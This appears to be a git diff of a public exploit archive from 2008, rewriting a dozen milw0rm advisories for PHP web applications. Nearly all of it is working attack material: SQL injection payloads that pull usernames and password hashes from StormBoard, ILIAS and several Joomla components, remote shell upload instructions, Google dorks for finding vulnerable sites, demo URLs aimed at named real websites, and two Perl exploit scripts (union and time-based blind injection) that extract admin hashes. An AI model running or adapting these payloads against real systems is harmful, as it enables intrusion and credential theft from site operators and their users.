diff --git a/platforms/php/webapps/7562.txt b/platforms/php/webapps/7562.txt
index e0a5eafa2..b4a9b9036 100755
--- a/platforms/php/webapps/7562.txt
+++ b/platforms/php/webapps/7562.txt
@@ -1,27 +1,27 @@
-.......................................................................
-
-****(remote shell upload)****
-
-script: phpAdBoard
-   
-***************************************************************************
-download from:http://www.w2b.ru/download/phpAdBoard.zip
-   
-***************************************************************************
-www.site.com/path/index.php
-shell: www.site.com/path/photoes/number_shell.php
------------------------------------------------------------------------------------------
-dork:"powered by phpAdBoard"
-
-if folder photoes is forbidden
-after get upload file u do right-click and see image properties and u see address file.
-  
-------------------------------------------------------------------------------------------  
-**************************************************
-
-
-Author: ahmadbady 
-
-**************************************************
-
-# milw0rm.com [2008-12-23]
+.......................................................................
+
+****(remote shell upload)****
+
+script: phpAdBoard
+   
+***************************************************************************
+download from:http://www.w2b.ru/download/phpAdBoard.zip
+   
+***************************************************************************
+www.site.com/path/index.php
+shell: www.site.com/path/photoes/number_shell.php
+-----------------------------------------------------------------------------------------
+dork:"powered by phpAdBoard"
+
+if folder photoes is forbidden
+after get upload file u do right-click and see image properties and u see address file.
+  
+------------------------------------------------------------------------------------------  
+**************************************************
+
+
+Author: ahmadbady 
+
+**************************************************
+
+# milw0rm.com [2008-12-23]
diff --git a/platforms/php/webapps/7563.txt b/platforms/php/webapps/7563.txt
index 7874e6628..98a7d3f7d 100755
--- a/platforms/php/webapps/7563.txt
+++ b/platforms/php/webapps/7563.txt
@@ -1,23 +1,23 @@
-****(remote shell upload)****
-
-script: phpEmployment
-   
-***************************************************************************
-download from:http://www.w2b.ru/download/phpEmployment.zip
-   
-***************************************************************************
-www.site.com/path/auth.php?mode=regnew&adtype=job
-
-shell: www.site.com/path/photoes/number_shell.php
-
-----------------------------------------------------------------------------------------
-dork:"powered by phpEmployment"
-------------------------------------------------------------------------------------------  
-**************************************************
-
-
-Author: ahmadbady 
-
-**************************************************
-
-# milw0rm.com [2008-12-23]
+****(remote shell upload)****
+
+script: phpEmployment
+   
+***************************************************************************
+download from:http://www.w2b.ru/download/phpEmployment.zip
+   
+***************************************************************************
+www.site.com/path/auth.php?mode=regnew&adtype=job
+
+shell: www.site.com/path/photoes/number_shell.php
+
+----------------------------------------------------------------------------------------
+dork:"powered by phpEmployment"
+------------------------------------------------------------------------------------------  
+**************************************************
+
+
+Author: ahmadbady 
+
+**************************************************
+
+# milw0rm.com [2008-12-23]
diff --git a/platforms/php/webapps/7565.txt b/platforms/php/webapps/7565.txt
index 4e9fe7528..a2415f693 100755
--- a/platforms/php/webapps/7565.txt
+++ b/platforms/php/webapps/7565.txt
@@ -1,35 +1,35 @@
-==============================================================================
-_________________________________{لااله الي لله محمد رسول لله}_________________________________
- ---------------------------------(Samir-M)---------------------------------- 
-      StormBoard Version 1.0.1 (thread.php id=) SQL Injection Vulnerability
-
-by  : Samir-M
-
-Msn : Km7@Hotmail.De
-
-from: Morocco
- ----------------------------------------------------------------------------
-darck :
-
-"Powered by : StormBoard Version 1.0.1"
- ---------------------------------------------------------------------------- 
-
-Exploit:
-
-site.com/thread.php?id=-null union select 1,2,3,4,5,6,7,8,concat(user_name,0x3e,user_password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from users
-
-
-Dome:
-al-andalos.com/thread.php?id=-null+union+all+select+1,2,3,4,5,6,7,8,concat(user_name,0x3e,user_password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users--
-
-
-Login:
-site.com/admin
-
- ----------------------------------------------------------------------------
-Samir-M > A-flow > Gess-Inject0r > Wassim-Net
- ----------------------------------------------------------------------------
-_______________________________________________________________________________
-===============================================================================
-
-# milw0rm.com [2008-12-23]
+==============================================================================
+_________________________________{لااله الي لله محمد رسول لله}_________________________________
+ ---------------------------------(Samir-M)---------------------------------- 
+      StormBoard Version 1.0.1 (thread.php id=) SQL Injection Vulnerability
+
+by  : Samir-M
+
+Msn : Km7@Hotmail.De
+
+from: Morocco
+ ----------------------------------------------------------------------------
+darck :
+
+"Powered by : StormBoard Version 1.0.1"
+ ---------------------------------------------------------------------------- 
+
+Exploit:
+
+site.com/thread.php?id=-null union select 1,2,3,4,5,6,7,8,concat(user_name,0x3e,user_password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from users
+
+
+Dome:
+al-andalos.com/thread.php?id=-null+union+all+select+1,2,3,4,5,6,7,8,concat(user_name,0x3e,user_password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users--
+
+
+Login:
+site.com/admin
+
+ ----------------------------------------------------------------------------
+Samir-M > A-flow > Gess-Inject0r > Wassim-Net
+ ----------------------------------------------------------------------------
+_______________________________________________________________________________
+===============================================================================
+
+# milw0rm.com [2008-12-23]
diff --git a/platforms/php/webapps/7567.txt b/platforms/php/webapps/7567.txt
index 3fb972f68..fca4cb68e 100755
--- a/platforms/php/webapps/7567.txt
+++ b/platforms/php/webapps/7567.txt
@@ -1,47 +1,47 @@
-Joomla Component com_lowcosthotels (id)  Blind SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script  : http://www.joomlahbs.com/
-
-DorK : inurl:index.php?option=com_lowcosthotels
-
-Demo :
-_______
-
-
-http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
-
-
-http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4
-
-
-or
-
-
-http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
-
-http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4
-
-
-____________________________( Greetz )_________________________________
-|
-|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
-|
-|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
-|_____________________________________________________________________
-
- _____   ____   __   __     _       ____        ____    ____
-|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
-  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |
-  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___
-  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|
-
-# milw0rm.com [2008-12-23]
+Joomla Component com_lowcosthotels (id)  Blind SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script  : http://www.joomlahbs.com/
+
+DorK : inurl:index.php?option=com_lowcosthotels
+
+Demo :
+_______
+
+
+http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
+
+
+http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4
+
+
+or
+
+
+http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
+
+http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4
+
+
+____________________________( Greetz )_________________________________
+|
+|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
+|
+|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
+|_____________________________________________________________________
+
+ _____   ____   __   __     _       ____        ____    ____
+|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
+  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |
+  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___
+  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|
+
+# milw0rm.com [2008-12-23]
diff --git a/platforms/php/webapps/7568.txt b/platforms/php/webapps/7568.txt
index 3a174c3a2..654d4664f 100755
--- a/platforms/php/webapps/7568.txt
+++ b/platforms/php/webapps/7568.txt
@@ -1,36 +1,36 @@
-Joomla Component com_allhotels (id)  Blind SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script  : http://www.joomlahbs.com/  &  http://www.leveltensolutions.net/spa/
-
-DorK : inurl:index.php?option=com_allhotels
-
-Demo :
-_______
-
-
-http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5
-
-http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=4
-____________________________( Greetz )_________________________________
-|
-|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
-|
-|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
-|_____________________________________________________________________
-
- _____   ____   __   __     _       ____        ____    ____
-|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
-  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |
-  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___
-  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|
-
-# milw0rm.com [2008-12-23]
+Joomla Component com_allhotels (id)  Blind SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script  : http://www.joomlahbs.com/  &  http://www.leveltensolutions.net/spa/
+
+DorK : inurl:index.php?option=com_allhotels
+
+Demo :
+_______
+
+
+http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5
+
+http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=4
+____________________________( Greetz )_________________________________
+|
+|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
+|
+|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
+|_____________________________________________________________________
+
+ _____   ____   __   __     _       ____        ____    ____
+|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
+  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |
+  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___
+  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|
+
+# milw0rm.com [2008-12-23]
diff --git a/platforms/php/webapps/7569.txt b/platforms/php/webapps/7569.txt
index 45daeaf4f..d3806ea01 100755
--- a/platforms/php/webapps/7569.txt
+++ b/platforms/php/webapps/7569.txt
@@ -1,31 +1,31 @@
---------------------------------------------------------------------------
-| Project: Doop <= 1.4.0b CSRF && Upload Shell                           |
-| Author: x0r                                                            |
-| Email: andry2000@hotmail.it                                            |
-|________________________________________________________________________|
-
-
-#-- CSRF Change Admin Pass --#
-
-----------------------------------------------------------------------
- 
-
    
-
- 
-
    
-----------------------------------------------------------------------
-
-
-#-- Upload Shell --#
-
-Ok. Una volta nel pannello di amministrazione possiamo uppare qualsiasi
-file ( non controlla l'estensione), quindi anche shell...una volta uppata
-la shell, possiamo usarla al seguente link:
-http://[site]/[path]/pages/[shell.php].
-
-
-# x0r
--- w00t Zone - w00tzone.org 
-
-# milw0rm.com [2008-12-24]
+--------------------------------------------------------------------------
+| Project: Doop <= 1.4.0b CSRF && Upload Shell                           |
+| Author: x0r                                                            |
+| Email: andry2000@hotmail.it                                            |
+|________________________________________________________________________|
+
+
+#-- CSRF Change Admin Pass --#
+
+----------------------------------------------------------------------
+ 
+
    
+
+ 
+
    
+----------------------------------------------------------------------
+
+
+#-- Upload Shell --#
+
+Ok. Una volta nel pannello di amministrazione possiamo uppare qualsiasi
+file ( non controlla l'estensione), quindi anche shell...una volta uppata
+la shell, possiamo usarla al seguente link:
+http://[site]/[path]/pages/[shell.php].
+
+
+# x0r
+-- w00t Zone - w00tzone.org 
+
+# milw0rm.com [2008-12-24]
diff --git a/platforms/php/webapps/7570.txt b/platforms/php/webapps/7570.txt
index a9ce6c7ba..b9e73103a 100755
--- a/platforms/php/webapps/7570.txt
+++ b/platforms/php/webapps/7570.txt
@@ -1,26 +1,26 @@
-###############################################################
-#
-#      ILIAS Learning Management <= 3.7.4 - SQL Injection Vulnerability     
-#                                                             
-#      Vulnerability discovered by: Lidloses_Auge             
-#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
-#                                   Palme, GPM, karamble, Free-Hack
-#      Date:                        24.12.2008
-#
-###############################################################
-#                                                             
-#      Developer: http://www.ilias.de
-#      Dork 1: "powered by ILIAS"
-#      Dork 2: inurl:repository.php ilias
-#      Description: The GET Parameter "ref_id" in "repository.php"
-#		    contains a Blind SQL Injection Vulnerability
-#
-#      Usertable:         usr_data
-#      Important columns: usr_id, login, passwd
-#
-#      Example:
-#      http://www.site.com/repository.php?cmd=frameset&ref_id=1+and+ascii(substring((select+passwd+from+usr_data+limit+0,1),1,1))>50--
-#                                                             
-###############################################################
-
-# milw0rm.com [2008-12-24]
+###############################################################
+#
+#      ILIAS Learning Management <= 3.7.4 - SQL Injection Vulnerability     
+#                                                             
+#      Vulnerability discovered by: Lidloses_Auge             
+#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
+#                                   Palme, GPM, karamble, Free-Hack
+#      Date:                        24.12.2008
+#
+###############################################################
+#                                                             
+#      Developer: http://www.ilias.de
+#      Dork 1: "powered by ILIAS"
+#      Dork 2: inurl:repository.php ilias
+#      Description: The GET Parameter "ref_id" in "repository.php"
+#		    contains a Blind SQL Injection Vulnerability
+#
+#      Usertable:         usr_data
+#      Important columns: usr_id, login, passwd
+#
+#      Example:
+#      http://www.site.com/repository.php?cmd=frameset&ref_id=1+and+ascii(substring((select+passwd+from+usr_data+limit+0,1),1,1))>50--
+#                                                             
+###############################################################
+
+# milw0rm.com [2008-12-24]
diff --git a/platforms/php/webapps/7572.txt b/platforms/php/webapps/7572.txt
index 8089fcdd2..de7aaa62b 100755
--- a/platforms/php/webapps/7572.txt
+++ b/platforms/php/webapps/7572.txt
@@ -1,44 +1,44 @@
-#############################################################
-Joomla Component com_ice(catid) Blind SQL-injection
-#############################################################
-
-
-###################################################
-#[~] Author        :  boom3rang 
-#[~] Greetz        :  H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
-#[~] Vulnerability :  Blind SQL injection 
-#[~] Google Dork   :  inurl:com_ice "catid"
---------------------------------------------------
-#[!] Ice Gallery
-#[!] 29/08/06
-#[!] Markus Donhauser
-#[!] ice.gallery@gmx.net
-#[!] 0.5 beta 2
-###################################################
-
-Example:
-http://localHost/path/index.php?option=com_ice&catid=1[SQL code]
-
-
-SQL code:
-and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96
-
-
-LiveDEMO:
-
-http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=4   >>(False)
-
-http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=5   >>(True)
-
-http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96
-
-
-
-
-##############################
-#[!] Proud 2 be Albanian
-#[!] Proud 2 be Muslim
-#[!] United States of Albania
-##############################
-
-# milw0rm.com [2008-12-24]
+#############################################################
+Joomla Component com_ice(catid) Blind SQL-injection
+#############################################################
+
+
+###################################################
+#[~] Author        :  boom3rang 
+#[~] Greetz        :  H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
+#[~] Vulnerability :  Blind SQL injection 
+#[~] Google Dork   :  inurl:com_ice "catid"
+--------------------------------------------------
+#[!] Ice Gallery
+#[!] 29/08/06
+#[!] Markus Donhauser
+#[!] ice.gallery@gmx.net
+#[!] 0.5 beta 2
+###################################################
+
+Example:
+http://localHost/path/index.php?option=com_ice&catid=1[SQL code]
+
+
+SQL code:
+and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96
+
+
+LiveDEMO:
+
+http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=4   >>(False)
+
+http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=5   >>(True)
+
+http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96
+
+
+
+
+##############################
+#[!] Proud 2 be Albanian
+#[!] Proud 2 be Muslim
+#[!] United States of Albania
+##############################
+
+# milw0rm.com [2008-12-24]
diff --git a/platforms/php/webapps/7573.txt b/platforms/php/webapps/7573.txt
index 023d53e16..6d72d1710 100755
--- a/platforms/php/webapps/7573.txt
+++ b/platforms/php/webapps/7573.txt
@@ -1,40 +1,40 @@
-#############################################################
-Joomla Component com_liveticker(tid) Blind SQL-injection
-#############################################################
-
-
-###################################################
-#[~] Author        :  boom3rang 
-#[~] Greetz        :  H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
-#[~] Vulnerability :  Blind SQL injection 
-#[~] Google Dork   :  inurl:com_liveticker 
---------------------------------------------------
-#[!] Name          :  Live Ticker
-#[!] Author        :  raven-worx
-#[!] AuthorEmail   :  info@raven-worx.net
-#[!] Version       :  1.0.0
-###################################################
-
-Example:
-http://localHost/path/index.php?option=com_liveticker&task=viewticker&tid=[SQL]
-
-
-
-LiveDEMO:
-
-
-http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=4   >>(False)
-
-
-http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=5   >>(True)
-
-
-
-
-##############################
-#[!] Proud 2 be Albanian
-#[!] Proud 2 be Muslim
-#[!] United States of Albania
-##############################
-
-# milw0rm.com [2008-12-24]
+#############################################################
+Joomla Component com_liveticker(tid) Blind SQL-injection
+#############################################################
+
+
+###################################################
+#[~] Author        :  boom3rang 
+#[~] Greetz        :  H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
+#[~] Vulnerability :  Blind SQL injection 
+#[~] Google Dork   :  inurl:com_liveticker 
+--------------------------------------------------
+#[!] Name          :  Live Ticker
+#[!] Author        :  raven-worx
+#[!] AuthorEmail   :  info@raven-worx.net
+#[!] Version       :  1.0.0
+###################################################
+
+Example:
+http://localHost/path/index.php?option=com_liveticker&task=viewticker&tid=[SQL]
+
+
+
+LiveDEMO:
+
+
+http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=4   >>(False)
+
+
+http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=5   >>(True)
+
+
+
+
+##############################
+#[!] Proud 2 be Albanian
+#[!] Proud 2 be Muslim
+#[!] United States of Albania
+##############################
+
+# milw0rm.com [2008-12-24]
diff --git a/platforms/php/webapps/7574.txt b/platforms/php/webapps/7574.txt
index b17152684..14e617f6f 100755
--- a/platforms/php/webapps/7574.txt
+++ b/platforms/php/webapps/7574.txt
@@ -1,36 +1,36 @@
-#############################################################
-Joomla Component com_mdigg(category) SQL-injection vulnerability
-#############################################################
-
-
-###################################################
-#[~] Author        :  boom3rang 
-#[~] Greetz        :  H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
-#[~] Vulnerability :  SQL injection 
-#[~] Google Dork   :  inurl:com_mdigg 
---------------------------------------------------
-#[!] Name          :  mdigg
-#[!] CreationDate  :  10-12-2007
-#[!] Author        :  Zhigang Lei
-#[!] AuthorEmail   :  zhigang.lei@gmail.com 
-#[!] Version       :  2.2.8 
-###################################################
-
-Example:
-http://localHost/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit]
-
-
-Exploit:
--9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*
-
-
-LiveDEMO:
-http://demo15.joomlaapps.com/index.php?option=com_mdigg&act=story_lists&task=view&category=-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*
-
-##############################
-#[!] Proud 2 be Albanian
-#[!] Proud 2 be Muslim
-#[!] United States of Albania
-##############################
-
-# milw0rm.com [2008-12-24]
+#############################################################
+Joomla Component com_mdigg(category) SQL-injection vulnerability
+#############################################################
+
+
+###################################################
+#[~] Author        :  boom3rang 
+#[~] Greetz        :  H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
+#[~] Vulnerability :  SQL injection 
+#[~] Google Dork   :  inurl:com_mdigg 
+--------------------------------------------------
+#[!] Name          :  mdigg
+#[!] CreationDate  :  10-12-2007
+#[!] Author        :  Zhigang Lei
+#[!] AuthorEmail   :  zhigang.lei@gmail.com 
+#[!] Version       :  2.2.8 
+###################################################
+
+Example:
+http://localHost/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit]
+
+
+Exploit:
+-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*
+
+
+LiveDEMO:
+http://demo15.joomlaapps.com/index.php?option=com_mdigg&act=story_lists&task=view&category=-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*
+
+##############################
+#[!] Proud 2 be Albanian
+#[!] Proud 2 be Muslim
+#[!] United States of Albania
+##############################
+
+# milw0rm.com [2008-12-24]
diff --git a/platforms/php/webapps/7575.pl b/platforms/php/webapps/7575.pl
index 09feaab9d..37c2a6947 100755
--- a/platforms/php/webapps/7575.pl
+++ b/platforms/php/webapps/7575.pl
@@ -1,44 +1,44 @@
-#!/usr/bin/perl -w
- 
- 
-#Joomla com_5starhotels Sql injection#
-########################################
-#[~] Author :  EcHoLL
-#[~] www.warezturk.org www.tahribat.com
-#[~] Greetz : Black_label TURK Godlike Nitrous
- 
-#[!] Module_Name:  com_5starhotels
-#[!] Script_Name:  Joomla
-#[!] Google_Dork:  inurl:"com_5starhotels"
-########################################
- 
- 
-system("color FF0000");
-system("Nohacking");
-print "\t\t-------------------------------------------------------------\n\n";
-print "\t\t|                 Turkish Securtiy Team                      |\n\n";
-print "\t\t-------------------------------------------------------------\n\n";
-print "\t\t|Joomla Module com_5starhotels(showhoteldetails&id=)Remote SQL Injection Vuln|\n\n";
-print "\t\t|   Coded by: EcHoLL     www.warezturk.org               |\n\n";
-print "\t\t-------------------------------------------------------------\n\n";
- 
-use LWP::UserAgent;
- 
-print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
- chomp(my $target=);
- 
-$column_name="concat(username,0x3a,password)";
-$table_name="jos_users";
- 
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
- 
-$host = $target .   "/index.php?option=com_5starhotels&task=showhoteldetails&id=1+union+select+1,".$column_name."+from/**/".$table_name."--";
-$res = $b->request(HTTP::Request->new(GET=>$host));$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
-  print "\n[+] Admin Hash : $1\n\n";
-  print "#   Tebrikler Exploit Calisti!  #\n\n";
-}
-else{print "\n[-] Exploit Bulunamadı...\n";
-}
-
-# milw0rm.com [2008-12-24]
+#!/usr/bin/perl -w
+ 
+ 
+#Joomla com_5starhotels Sql injection#
+########################################
+#[~] Author :  EcHoLL
+#[~] www.warezturk.org www.tahribat.com
+#[~] Greetz : Black_label TURK Godlike Nitrous
+ 
+#[!] Module_Name:  com_5starhotels
+#[!] Script_Name:  Joomla
+#[!] Google_Dork:  inurl:"com_5starhotels"
+########################################
+ 
+ 
+system("color FF0000");
+system("Nohacking");
+print "\t\t-------------------------------------------------------------\n\n";
+print "\t\t|                 Turkish Securtiy Team                      |\n\n";
+print "\t\t-------------------------------------------------------------\n\n";
+print "\t\t|Joomla Module com_5starhotels(showhoteldetails&id=)Remote SQL Injection Vuln|\n\n";
+print "\t\t|   Coded by: EcHoLL     www.warezturk.org               |\n\n";
+print "\t\t-------------------------------------------------------------\n\n";
+ 
+use LWP::UserAgent;
+ 
+print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
+ chomp(my $target=);
+ 
+$column_name="concat(username,0x3a,password)";
+$table_name="jos_users";
+ 
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+ 
+$host = $target .   "/index.php?option=com_5starhotels&task=showhoteldetails&id=1+union+select+1,".$column_name."+from/**/".$table_name."--";
+$res = $b->request(HTTP::Request->new(GET=>$host));$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
+  print "\n[+] Admin Hash : $1\n\n";
+  print "#   Tebrikler Exploit Calisti!  #\n\n";
+}
+else{print "\n[-] Exploit Bulunamadı...\n";
+}
+
+# milw0rm.com [2008-12-24]
diff --git a/platforms/php/webapps/7576.pl b/platforms/php/webapps/7576.pl
index 57416f147..59bd3d6f3 100755
--- a/platforms/php/webapps/7576.pl
+++ b/platforms/php/webapps/7576.pl
@@ -1,110 +1,110 @@
-#!/usr/bin/perl -w
-# -------------------------------------------------------
-# PHP-Fusion <= 7.00.2 Remote Blind SQL Injection Exploit
-# by athos - staker[at]hotmail[dot]it
-# download on http://php-fusion.co.uk
-# -------------------------------------------------------
-# Usage:
-# perl xpl.pl host/path prefix user_id user_pwd target_id
-# perl xpl.pl localhost/php-fusion fusion 5 anarchy 1
-# -------------------------------------------------------
-# Note: magic_quotes_gpc off && register globals on
-#       don't add me on msn messenger 
-#       my email staker.38@gmail.com
-# 
-# Greetz: str0ke,The:Paradox,darkjoker,Key and #cancer :D 
-# -------------------------------------------------------
-# This is pratically the same vulnerability of 6.01.14
-# version (http://milw0rm.com/exploits/5470) found by 
-# The:Paradox. PHP-Fusion's coder seems not interested in
-# Web Security, isn't him? 
-# -------------------------------------------------------
-# User Password:  my $field = "user_password" ;
-# Admin Password: my $field = "user_admin_password";                   
-# -------------------------------------------------------
-
-use strict;
-use Digest::MD5('md5_hex');
-use LWP::UserAgent;
-
-
-my $field = "user_password";
-my ($stop,$start,$hash);
-
-
-my $domain = shift;
-my $ptable = shift;
-my $ulogin = shift;
-my $plogin = shift;
-my $userid = shift or &usage;
-
-my @chars = (48..57, 97..102); 
-my $substr = 1; 
-my $http = new LWP::UserAgent;
-
-
-
-sub send_request
-{ 
-     my $post = undef;
-     my $host = $domain;
-     my $param = shift @_ or die $!;
-  
-     $host  .= "/submit.php?stype=l";
-
-     $http->default_header('Cookie' => "fusion_user=${ulogin}.".md5_hex($plogin));
-     $post = $http->post('http://'.$host,[
-                                 'link_category'    => 1,
-                                 'link_name'        => 1,
-                                 'link_url'         => 1,
-                                 'link_description' => 1,
-                                 'submit_link'      => 'Submit+Link',
-                                 'submit_info[pwn]' => $param,
-                               ]);
- 
-}
-
-
-sub give_char
-{
-     my $send = undef;
-     my ($charz,$uidz) = @_;
-  
-     $send = "' or (select if((ascii(substring".
-             "($field,$uidz,1))=$charz),".
-             "benchmark(230000000,char(0)),".
-            "0) from ${ptable}_users where user_id=$userid))#";
-
-     return $send;
-}
-
-
-for(1..32) 
-{
-     foreach my $set(@chars)
-     {
-          my $start = time();
-    
-          send_request(give_char($set,$substr));
-    
-          my $stop = time();
-  
-         if($stop - $start > 6)
-         { 
-              syswrite(STDOUT,chr($set));
-              $substr++; 
-              last;
-        }
-    }
-}
-
-sub usage
-{
-      print "PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit\n";
-      print "by athos - staker[at]hotmail[dot]it\n";
-      print "Usage: perl $0 [host/path] [table prefix] [id] [password] [target id]\n";
-      print "Usage: perl $0 localhost/php-fusion fusion 5 p4ssw0rd 1\n"; 
-      exit; 
-}     
-
-# milw0rm.com [2008-12-24]
+#!/usr/bin/perl -w
+# -------------------------------------------------------
+# PHP-Fusion <= 7.00.2 Remote Blind SQL Injection Exploit
+# by athos - staker[at]hotmail[dot]it
+# download on http://php-fusion.co.uk
+# -------------------------------------------------------
+# Usage:
+# perl xpl.pl host/path prefix user_id user_pwd target_id
+# perl xpl.pl localhost/php-fusion fusion 5 anarchy 1
+# -------------------------------------------------------
+# Note: magic_quotes_gpc off && register globals on
+#       don't add me on msn messenger 
+#       my email staker.38@gmail.com
+# 
+# Greetz: str0ke,The:Paradox,darkjoker,Key and #cancer :D 
+# -------------------------------------------------------
+# This is pratically the same vulnerability of 6.01.14
+# version (http://milw0rm.com/exploits/5470) found by 
+# The:Paradox. PHP-Fusion's coder seems not interested in
+# Web Security, isn't him? 
+# -------------------------------------------------------
+# User Password:  my $field = "user_password" ;
+# Admin Password: my $field = "user_admin_password";                   
+# -------------------------------------------------------
+
